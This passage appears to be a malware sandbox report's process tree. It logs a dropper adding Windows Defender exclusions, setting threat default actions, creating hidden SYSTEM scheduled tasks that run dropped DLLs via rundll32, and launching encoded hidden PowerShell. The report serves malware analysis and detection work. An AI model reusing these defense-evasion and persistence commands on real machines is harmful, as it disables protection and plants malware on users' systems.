                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2092
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1608
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                          PID:924
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                            PID:404
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
                                                                                                            4⤵
                                                                                                              PID:848
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
                                                                                                              4⤵
                                                                                                                PID:288
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                4⤵
                                                                                                                  PID:2956
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                  4⤵
                                                                                                                    PID:1708
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                    4⤵
                                                                                                                      PID:2720
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                      4⤵
                                                                                                                        PID:2268
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
                                                                                                                        4⤵
                                                                                                                          PID:2232
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
                                                                                                                          4⤵
                                                                                                                            PID:3008
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                            4⤵
                                                                                                                              PID:2264
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                              4⤵
                                                                                                                                PID:1008
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                4⤵
                                                                                                                                  PID:1164
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                  4⤵
                                                                                                                                    PID:2832
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:32
                                                                                                                                    4⤵
                                                                                                                                      PID:2652
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:64
                                                                                                                                      4⤵
                                                                                                                                        PID:2664
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                                                        4⤵
                                                                                                                                          PID:2772
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                                                          4⤵
                                                                                                                                            PID:2916
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "gHnrltQRU" /SC once /ST 00:56:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                          3⤵
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:3016
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /run /I /tn "gHnrltQRU"
                                                                                                                                          3⤵
                                                                                                                                            PID:2152
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /DELETE /F /TN "gHnrltQRU"
                                                                                                                                            3⤵
                                                                                                                                              PID:768
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:1740
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2560
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1500
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1468
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 00:54:06 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\dTOxcRD.exe\" 0c /NWMHdidZJ 385120 /S" /V1 /F
                                                                                                                                                      3⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:2768
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2028
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 628
                                                                                                                                                        3⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:2700
                                                                                                                                                    • C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\dTOxcRD.exe
                                                                                                                                                      C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\dTOxcRD.exe 0c /NWMHdidZJ 385120 /S
                                                                                                                                                      2⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:2004
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2112
                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:644
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:2804
                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:2260
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1380
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:1080
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:1328
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:2764
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:1512
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:1696
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1412
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:2752
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:1712
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:568
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:2748
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:2904
                                                                                                                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:1800
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3068
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2912
                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:488
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:2224
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:1236
                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:288
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:2776
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:1476
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:2656
                                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:2576
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\zRkLhr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:1812
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\zlkgxAn.xml" /RU "SYSTEM"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:1284
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /END /TN "ucrVpivlTlXwlAC"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1328
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1696
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\dTSOkfv.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:2752
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\LbTSvbt.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:2932
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\SPSWawX.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:2360
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\EkjwwPL.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:1996
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 00:30:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\FtydIvqu\mFxtQQl.dll\",#1 /dldidQMS 385120" /V1 /F
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:2756
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:3068
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:592
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 1524
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:2396
                                                                                                                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\FtydIvqu\mFxtQQl.dll",#1 /dldidQMS 385120
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:848
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\FtydIvqu\mFxtQQl.dll",#1 /dldidQMS 385120
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              PID:944
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:2444
                                                                                                                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                            taskeng.exe {E0186FCA-D199-499C-8F50-133AD920F141} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:1168
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                PID:2092
                                                                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:496
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:1164
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1628
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                    2⤵
